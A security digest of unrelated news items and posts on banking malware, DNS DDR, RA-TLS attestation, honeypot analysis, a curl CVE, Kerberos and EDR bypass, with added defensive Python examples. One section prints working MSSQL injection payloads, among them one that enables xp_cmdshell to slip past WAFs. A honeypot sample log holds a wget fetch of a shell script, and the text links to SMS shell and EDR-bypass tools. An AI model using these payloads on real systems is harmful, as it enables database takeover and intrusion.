https://www.theregister.com/2023/12/20/credentialstealing_malware_infects_50k_banking/
When the requested banking page "contains a certain keyword and a login button with a specific ID present, new malicious content is injected," Langus explained. "Credential theft is executed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it."
The script is fairly smart: it communicates with a remote command-and-control (C2) server, and removes itself from the DOM tree – deletes itself from the login page, basically – once it's done its thing, which makes it tricky to detect and analyze.
The malware can perform a series of nefarious actions, and these are based on an "mlink" flag the C2 sends. In total, there are nine different actions that the malware can perform depending on the "mlink" value, we're told.
These include injecting a prompt for the user's phone number or two-factor authentication token, which the miscreants can use with the intercepted username and password to access the victim's bank account and steal their cash.
What's Normal: New uses of DNS, Discovery of Designated Resolvers (DDR)
Local recursive resolvers are usually configured via DHCP. Your ISP, or the network you connect to, will usually advertise one or two IP addresses to use as your resolver. As far as I know, DHCP cannot configure an encrypted resolver. But earlier today, @HQuest on X pointed out that iOS 17 implemented a new protocol, "Discovery of Designated Resolvers (DDR)". [1]
The idea is that a resolver you have already configured via traditional means like DHCP may advertise that it is also reachable via DoH/Q/T. Cloudflare stated that they implemented experimental support for DDR in March of 2022, but my tests today did not get the expected response [2].
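As an added example (not from the ISC diary), here is what a DDR exchange looks like on the wire: the client asks its existing resolver for `_dns.resolver.arpa IN SVCB` (RFC 9462, SVCB is type 64), and the answer designates encrypted endpoints by ALPN, port and, for DoH, a URI template. Standard library only; the response bytes are constructed below for illustration and were not captured from any real resolver, and `resolver.example` is a made-up target.

```python
"""Added example (not from the ISC diary): the DDR query a client sends and a parser for the
SVCB answer, per RFC 9462 (_dns.resolver.arpa, type SVCB = 64). Standard library only; the
response bytes are assembled below for illustration, not captured from any real resolver."""
import struct

TYPE_SVCB = 64
KEY_ALPN, KEY_PORT, KEY_DOHPATH = 1, 3, 7

def encode_name(name):
    """Uncompressed wire-format domain name."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def build_ddr_query(txid=0x1234):
    """_dns.resolver.arpa IN SVCB, recursion desired."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name("_dns.resolver.arpa") + struct.pack("!HH", TYPE_SVCB, 1)

def decode_name(buf, off):
    """Decode a possibly compressed name; returns (name, offset after it)."""
    labels = []
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            break
        if (ln & 0xC0) == 0xC0:  # compression pointer ends the name
            tail, _ = decode_name(buf, ((ln & 0x3F) << 8) | buf[off])
            labels.append(tail)
            off += 1
            break
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), off

def parse_svcb_rdata(rdata):
    """SvcPriority, TargetName, then SvcParams as (key u16, length u16, value)."""
    rec = {"priority": struct.unpack("!H", rdata[:2])[0]}
    rec["target"], off = decode_name(rdata, 2)
    while off < len(rdata):
        key, ln = struct.unpack("!HH", rdata[off:off + 4])
        val = rdata[off + 4:off + 4 + ln]
        off += 4 + ln
        if key == KEY_ALPN:  # list of 1-byte-length-prefixed protocol ids
            alpns, i = [], 0
            while i < len(val):
                alpns.append(val[i + 1:i + 1 + val[i]].decode("ascii"))
                i += 1 + val[i]
            rec["alpn"] = alpns
        elif key == KEY_PORT:
            rec["port"] = struct.unpack("!H", val)[0]
        elif key == KEY_DOHPATH:  # URI template such as /dns-query{?dns}
            rec["dohpath"] = val.decode("utf-8")
        else:
            rec["key%d" % key] = val  # ipv4hint, ipv6hint, ... left raw here
    return rec

def parse_ddr_response(buf):
    """SVCB answers sorted by SvcPriority (lower is preferred)."""
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", buf[:12])
    off = 12
    for _ in range(qd):  # skip the question section
        _, off = decode_name(buf, off)
        off += 4
    answers = []
    for _ in range(an):
        _, off = decode_name(buf, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        if rtype == TYPE_SVCB:
            answers.append(parse_svcb_rdata(buf[off:off + rdlen]))
        off += rdlen
    return sorted(answers, key=lambda r: r["priority"])

def encode_svc_params(params):
    """SvcParams in ascending key order, as RFC 9460 requires."""
    out = b""
    for key in sorted(params):
        val = params[key]
        if key == KEY_ALPN:
            raw = b"".join(bytes([len(a)]) + a.encode("ascii") for a in val)
        elif key == KEY_PORT:
            raw = struct.pack("!H", val)
        else:
            raw = val.encode("utf-8")
        out += struct.pack("!HH", key, len(raw)) + raw
    return out

def constructed_response(txid=0x1234):
    """Made-up answer: a DoH and a DoT designation for resolver.example (not a real host)."""
    qname = encode_name("_dns.resolver.arpa")
    msg = struct.pack("!HHHHHH", txid, 0x8180, 1, 2, 0, 0) + qname + struct.pack("!HH", TYPE_SVCB, 1)
    for prio, params in ((1, {KEY_ALPN: ["h2", "h3"], KEY_PORT: 443, KEY_DOHPATH: "/dns-query{?dns}"}),
                         (2, {KEY_ALPN: ["dot"], KEY_PORT: 853})):
        rdata = struct.pack("!H", prio) + encode_name("resolver.example") + encode_svc_params(params)
        msg += qname + struct.pack("!HHIH", TYPE_SVCB, 1, 300, len(rdata)) + rdata
    return msg
```

To try it against a real resolver, send `build_ddr_query()` over UDP to port 53 of the DHCP-supplied resolver and feed the reply to `parse_ddr_response`; an empty list means the resolver does not advertise DDR. The check this code leaves out is the one RFC 9462 makes mandatory before trusting an answer obtained this way: the TLS certificate presented by the designated target must be valid and must include the IP address of the unencrypted resolver that handed out the designation, otherwise an on-path attacker who can spoof DNS could redirect all future queries to an encrypted resolver of their choosing.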
What's Normal? DNS TTL Values
I am trying to start a series of brief diaries about "what's normal." Analysts often only look at the network when they suspect something is wrong. But to find the anomaly, someone must first know what's normal. So, I am trying to collect data from my home network to show what to consider. The values I am presenting here are normal for my home network and will likely differ for your network. So, instead of just copying/pasting, run the experiment yourself :)
https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/
A detailed guide to bug bounty in 2023: where, what and how to hunt to get the most out of it.
Plenty of links to real-world cases, research by well-known bug hunters, labs and repositories of useful tools.
a follow-up to the previous post
https://news.ycombinator.com/item?id=36954351
"RA-TLS (Remote Attestation TLS) architecture is defined in the white paper Integrating Remote Attestation with Transport Layer Security, to enable Intel® Software Guard Extensions (Intel® SGX) remote attestation during the establishment of a standard Transport Layer Security (TLS) connection. In a TLS server / client scenario, the TLS server runs inside an SGX enclave. It generates a public-private keypair, creates an SGX report with a hash of the public key in its user-data field, and gets an SGX quote for this report. It then creates an X.509 certificate with a custom extension containing this SGX quote. This customized certificate is sent to a TLS client in the TLS handshake protocol. The client gets the SGX quote from the certificate and performs remote attestation to verify that the connected server runs inside an authentic Intel® SGX enclave."
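The property that makes the scheme above work is the binding in the report: the client must check not only that the quote is genuine and comes from the expected enclave, but that the hash in `report_data` is the hash of the public key actually carried in the certificate; otherwise a genuine quote could be lifted out of one certificate and placed in another carrying an attacker's key. The following is an added model of that check, not Intel's or any RA-TLS implementation's code. Real SGX quotes are signed by the Quoting Enclave and verified against Intel's attestation collateral; here the quote signature is simulated with an HMAC under a key the verifier is assumed to trust, the "report" is simplified to `MRENCLAVE || report_data`, and the "certificate" is a length-prefixed public key followed by the quote in place of a real X.509 extension. Key bytes and measurement are constructed stand-ins.

```python
"""Added example, not Intel's or any RA-TLS implementation's code: a minimal model of the
key-to-quote binding RA-TLS relies on. The Quoting Enclave signature is simulated with HMAC,
the SGX report is reduced to MRENCLAVE || report_data, and the X.509 certificate with its
custom extension is reduced to a length-prefixed public key followed by the quote."""
import hashlib
import hmac
import os

# Simulation only: stands in for the Quoting Enclave's attestation key and for the
# measurement of the enclave the client is willing to talk to.
QE_KEY = os.urandom(32)
EXPECTED_MRENCLAVE = hashlib.sha256(b"constructed-enclave-image").digest()
REPORT_DATA_LEN = 64  # SGX report_data is 64 bytes

def report_data_for(pubkey):
    """RA-TLS convention: SHA-256 of the public key, zero-padded to 64 bytes."""
    return hashlib.sha256(pubkey).digest().ljust(REPORT_DATA_LEN, b"\x00")

def make_quote(mrenclave, report_data):
    """Simulated Quoting Enclave: the report followed by a signature over it."""
    report = mrenclave + report_data
    return report + hmac.new(QE_KEY, report, "sha256").digest()

def encode_cert(pubkey, quote):
    """Certificate model: 2-byte length + key, 2-byte length + quote 'extension'."""
    return len(pubkey).to_bytes(2, "big") + pubkey + len(quote).to_bytes(2, "big") + quote

def parse_cert(cert):
    n = int.from_bytes(cert[:2], "big")
    pubkey = cert[2:2 + n]
    m = int.from_bytes(cert[2 + n:4 + n], "big")
    return pubkey, cert[4 + n:4 + n + m]

def enclave_issue_cert(pubkey):
    """Server side: bind the freshly generated key to the enclave through the quote."""
    return encode_cert(pubkey, make_quote(EXPECTED_MRENCLAVE, report_data_for(pubkey)))

def client_verify(cert):
    """Client side: quote signature, then measurement, then key binding. Returns (ok, reason)."""
    pubkey, quote = parse_cert(cert)
    report, sig = quote[:-32], quote[-32:]
    if not hmac.compare_digest(hmac.new(QE_KEY, report, "sha256").digest(), sig):
        return False, "quote signature invalid"
    mrenclave, report_data = report[:32], report[32:32 + REPORT_DATA_LEN]
    if mrenclave != EXPECTED_MRENCLAVE:
        return False, "unexpected enclave measurement"
    if not hmac.compare_digest(report_data, report_data_for(pubkey)):
        return False, "certificate key is not the key the enclave attested"
    return True, "ok"

def substitute_key(cert, attacker_pubkey):
    """Attack model: relay a genuine quote inside a certificate carrying the attacker's key."""
    _, quote = parse_cert(cert)
    return encode_cert(attacker_pubkey, quote)
```

The order of the three checks matters in practice as well: signature first, so that nothing is concluded from an unsigned report; measurement second, so the client only accepts code it has approved; binding last, so that even an authentic quote from the right enclave is useless to anyone who does not hold the private key matching the certificate. A production verifier additionally checks the quote's collateral (TCB level, signer, security version) rather than a single measurement, which this model leaves out.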
MSSQL has a little-known quirk that can come in handy on a pentest.
";" is the character we are used to using to separate several statements in SQL syntax (subqueries aside).
PostgreSQL or MySQL, say, will trip over a construction like
SELECT 'A' SELECT 'B' SELECT 'C'
and complain that we broke the syntax by leaving out the required terminator, since they expect the statements to be separated by a semicolon. In T-SQL the terminator is optional for most statements (Microsoft documents this as deprecated behaviour), so MSSQL executes all three and queries like the following are perfectly valid:
SELECT * FROM test WHERE id = 1 WAITFOR DELAY '0:0:5'
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test]
Or another example, this time changing the server configuration so that xp_cmdshell can be executed:
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
This is useful because some WAFs see such strings, consider them harmless and let the requests through. AWS WAF, for example, which is where this bug was reported.
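Why this slips past a filter is easier to see from the detection side. The added example below is not from the post: it runs the two payloads quoted above through a constructed separator-based rule of the kind a WAF might use, which misses them, and through a small T-SQL tokenizer that strips comments, treats square brackets as delimiters and counts statement-starting keywords at parenthesis depth 0, which catches stacked statements whether or not a semicolon is present. The benign subquery and both rules are constructed for illustration.

```python
"""Added example, not from the post: a separator-based WAF rule versus a tokenizer that
counts statement heads. The first two payloads are the ones quoted in the post; the
benign query and both rules are constructed for illustration."""
import re

PAYLOADS = {
    "conventional": "SELECT * FROM test WHERE id = 1; WAITFOR DELAY '0:0:5'",
    "no_semicolon": "SELECT * FROM test WHERE id = 1 WAITFOR DELAY '0:0:5'",
    "compact": "use[tempdb]create/**/table[test]([id]int)insert[test]values(1)"
               "select[id]from[test]drop/**/table[test]",
}
BENIGN = "SELECT name FROM users WHERE id IN (SELECT user_id FROM orders WHERE total > 10)"

# Naive rule: a statement separator followed by a dangerous keyword.
NAIVE = re.compile(r";\s*(waitfor|exec|execute|drop|create|insert|use)\b", re.I)

STATEMENT_HEADS = {"select", "insert", "update", "delete", "create", "drop", "alter",
                   "use", "exec", "execute", "waitfor", "declare", "truncate"}

def naive_waf_blocks(query):
    """Misses anything that stacks statements without a semicolon."""
    return NAIVE.search(query) is not None

def normalize_tsql(query):
    """In T-SQL, comments act as whitespace and [ ] are identifier delimiters."""
    q = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    q = re.sub(r"--[^\n]*", " ", q)
    q = re.sub(r"[\[\]]", " ", q)
    return q.lower()

def tokenize(query):
    """Quoted strings (with '' escapes), identifiers, numbers, parentheses, other symbols."""
    return re.findall(r"'(?:[^']|'')*'|[a-z_][a-z0-9_]*|\d+|[()]|\S", normalize_tsql(query))

def stacked_statement_count(query):
    """Statement-starting keywords at parenthesis depth 0; subqueries are not counted."""
    depth, heads = 0, 0
    for tok in tokenize(query):
        if tok == "(":
            depth += 1
        elif tok == ")":
            depth = max(0, depth - 1)
        elif depth == 0 and tok in STATEMENT_HEADS:
            heads += 1
    return heads

def hardened_waf_blocks(query):
    """Block when more than one top-level statement appears, separator or not."""
    return stacked_statement_count(query) > 1
```

Counting statement heads is an illustration of normalizing before matching, not a production rule; it will flag legitimate multi-statement batches, and a determined attacker will look for the next tokenizer discrepancy (the `admin'...` payload above, for instance, only tokenizes sensibly once the application's own opening quote is taken into account). The durable lesson from the post is that a filter which reasons about separators rather than statements is testing for a property the target parser does not require.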
Excellent! Now a shell can be pushed through SMS too.
While the security team fights DLP, tunes policies and fills the ports with epoxy, just send an SMS to the number.
TCPoverSMS, my ass.
https://github.com/persistent-security/SMShell
https://www.bleepingcomputer.com/news/technology/registrars-can-now-block-all-domains-that-resemble-brand-names/
Paid brand protection against phishing domains 😁 (results not guaranteed)
What did I say to make you stop talking to me?
[...] Attackers are interested in attempting to detect honeypots; over the years, we have seen various ways to do so. But so far, we have not done much to prevent this. We randomize some of the parameters, but overall, we just run a "stock" cowrie install. There is, however, a relatively easy method to find out what gave the honeypot away after the attacker connected.
Most attackers will immediately disconnect after they realize they have found a honeypot. So as a simple method, you just find out what the last command was that an attacker executed. I just did this for some of our larger honeypots, investigating about 10 million cowrie sessions. [...]
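The method described above, as an added example that is not the diary's code: cowrie writes one JSON object per line with an `eventid`, a `session` id and, for `cowrie.command.input`, the typed command in `input`; sessions interleave in the log, so events are grouped by session first, and the last command is taken only from sessions that actually closed. The log lines embedded below are constructed for illustration (trimmed to the fields the analysis needs) and the IP addresses and URL in them are documentation placeholders.

```python
"""Added example, not the diary's code: the last command attackers ran before disconnecting,
aggregated across cowrie JSON-log sessions. The sample log is constructed for illustration."""
import json
from collections import Counter, defaultdict

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"198.51.100.7","timestamp":"2023-11-01T10:00:00Z"}
{"eventid":"cowrie.login.success","session":"a1","username":"root","password":"123456","timestamp":"2023-11-01T10:00:01Z"}
{"eventid":"cowrie.command.input","session":"a1","input":"uname -a","timestamp":"2023-11-01T10:00:02Z"}
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"203.0.113.9","timestamp":"2023-11-01T10:00:02Z"}
{"eventid":"cowrie.command.input","session":"a1","input":"cat /proc/cpuinfo | grep name | wc -l","timestamp":"2023-11-01T10:00:03Z"}
{"eventid":"cowrie.command.input","session":"b2","input":"cat /proc/cpuinfo | grep name | wc -l","timestamp":"2023-11-01T10:00:04Z"}
{"eventid":"cowrie.session.closed","session":"a1","duration":3.4,"timestamp":"2023-11-01T10:00:04Z"}
{"eventid":"cowrie.session.closed","session":"b2","duration":2.1,"timestamp":"2023-11-01T10:00:05Z"}
{"eventid":"cowrie.session.connect","session":"c3","src_ip":"192.0.2.5","timestamp":"2023-11-01T10:00:06Z"}
{"eventid":"cowrie.session.closed","session":"c3","duration":0.9,"timestamp":"2023-11-01T10:00:07Z"}
{"eventid":"cowrie.session.connect","session":"d4","src_ip":"192.0.2.6","timestamp":"2023-11-01T10:00:08Z"}
{"eventid":"cowrie.command.input","session":"d4","input":"wget http://example.invalid/x.sh","timestamp":"2023-11-01T10:00:09Z"}
"""

def sessions_from_log(lines):
    """Group events by session id; events from different sessions interleave in the log."""
    sessions = defaultdict(lambda: {"commands": [], "closed": False, "duration": None})
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated or corrupt line must not abort a 10-million-line run
        s = sessions[ev["session"]]
        if ev["eventid"] == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif ev["eventid"] == "cowrie.session.closed":
            s["closed"] = True
            s["duration"] = ev.get("duration")
    return sessions

def last_commands(sessions):
    """Count the final command of every closed session that ran at least one command."""
    counts = Counter()
    for s in sessions.values():
        if s["closed"] and s["commands"]:
            counts[s["commands"][-1]] += 1
    return counts

if __name__ == "__main__":
    for cmd, n in last_commands(sessions_from_log(SAMPLE_LOG.splitlines())).most_common():
        print(n, cmd)
```

On a real cowrie deployment the input is `var/log/cowrie/cowrie.json*` and the interesting entries are the commands that sit at the top of the count while being cheap to run and revealing about the environment, since those are the ones attackers use as fingerprints. Sessions that close without any command, and sessions still open at the end of the log, are deliberately left out of the count rather than guessed at.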
Decoupling for Security
In the last few years, a slew of ideas old and new have converged to reveal a path out of this morass, but they haven’t been widely recognized, combined, or used. These ideas, which we’ll refer to in the aggregate as “decoupling,” allow us to rethink both security and privacy.
Here's the gist. The less someone knows, the less they can put you and your data at risk. In security this is called Least Privilege. The decoupling principle applies that idea to cloud services by making sure systems know as little as possible while doing their jobs. It states that we gain security and privacy by separating private data that today is unnecessarily concentrated.
Malware Dropped Through a ZPAQ Archive
[...]
The file was called "Purchase Order pdf.zpaq" (SHA256:1c33eef0d22dc54bb2a41af485070612cd4579529e31b63be2141c4be9183eb6). Because the archive uses an "exotic" compression algorithm, the VT score is null! I tried the classic tools on a stock Windows operating system, including 7Zip, and none was able to decompress the archive. This is strange because it reduces the number of potential victims! On Windows, you can use PeaZip.
CVE-2023-38545: curl SOCKS5 oversized hostname vulnerability. How bad is it?
The vulnerability is a heap-based buffer overflow, which may lead to arbitrary code execution. Modern operating systems should make exploitation of heap-based buffer overflows more difficult, but exploitation is possible.
To exploit this vulnerability, the attacker has to be able to supply an oversized hostname to curl. Host names passed to curl should be validated, and I do not believe such an oversized hostname would pass input validation. Sure, an attacker can run "curl" on the command line, but if they can do so, they already have code execution capabilities. A valid exploit would require an attacker to trigger code execution by, for example, passing a hostname to a web app that would trigger the code execution in curl.
Next, the exploit only exists if curl is used to connect to a SOCKS5 proxy. This is another dependency, making exploitation less likely.
Kerberos Protocol Tutorial
The Kerberos protocol is designed to provide reliable authentication over open and insecure networks where communications between the hosts belonging to it may be intercepted. However, one should be aware that Kerberos does not provide any guarantees if the computers being used are vulnerable: the authentication servers, application servers (imap, pop, smtp, telnet, ftp, ssh, AFS, lpr, ...) and clients must be kept constantly updated so that the authenticity of the requesting users and service providers can be guaranteed.
The above points justify the sentence: "Kerberos is an authentication protocol for trusted hosts on untrusted networks". By way of example, and to reiterate the concept: Kerberos' strategies are useless if someone who obtains privileged access to a server can copy the file containing the secret key. Indeed, the intruder will put this key on another machine and then need only spoof the server's DNS name or IP address for that machine to appear to clients as the authentic server.
https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/
This is scary. It's (strong) SafetyNet for websites.
Every now and then I run into another Android app I can no longer run because someone decided my phone, running an official build of my choice of OS, that isn't even rooted, is "not trustable".
Now they want to start doing that for websites.
This kills open Linux on the desktop (including Asahi Linux). It kills alternative browsers. It is a backdoor to kill ad blockers.
No. Just no. Please.
https://github.com/RupertBenWiser/Web-Environment-Integrity/blob/main/explainer.md
source: Asahi Lina (朝日リナ)
https://www.hackerfactor.com/blog/index.php?/archives/995-No-NOC-Networking-Part-1.html
[...] I run a bunch of web sites, but I don't have a room full of IT experts. I don't have a network operations center (NOC), security operations center (SOC), or even a full-time system administrator. What I have is me. And I only pay attention to the computers when I'm in the office.
[...] I know my servers are constantly being scanned and attacked. But rather than relying on humans monitoring the network for potential attacks, I've created some automated defenses that permit me to manage the servers with almost no overhead. [...]
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#red_team #pentest #infra
A collection of materials on EDR bypass
https://blog.nviso.eu/2021/10/21/kernel-karnage-part-1/
https://windows-internals.com/thread-and-process-state-change/
https://nasbench.medium.com/symantec-edr-internals-event-enrichment-rules-part-i-b5e4340041a7
https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker
https://github.com/CCob/SharpBlock/
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://github.com/jthuraisamy/SysWhispers2
https://www.crummie5.club/freshycalls/
https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/
https://github.com/jthuraisamy/TelemetrySourcerer/blob/master/TelemetrySourcerer/UmETW.cpp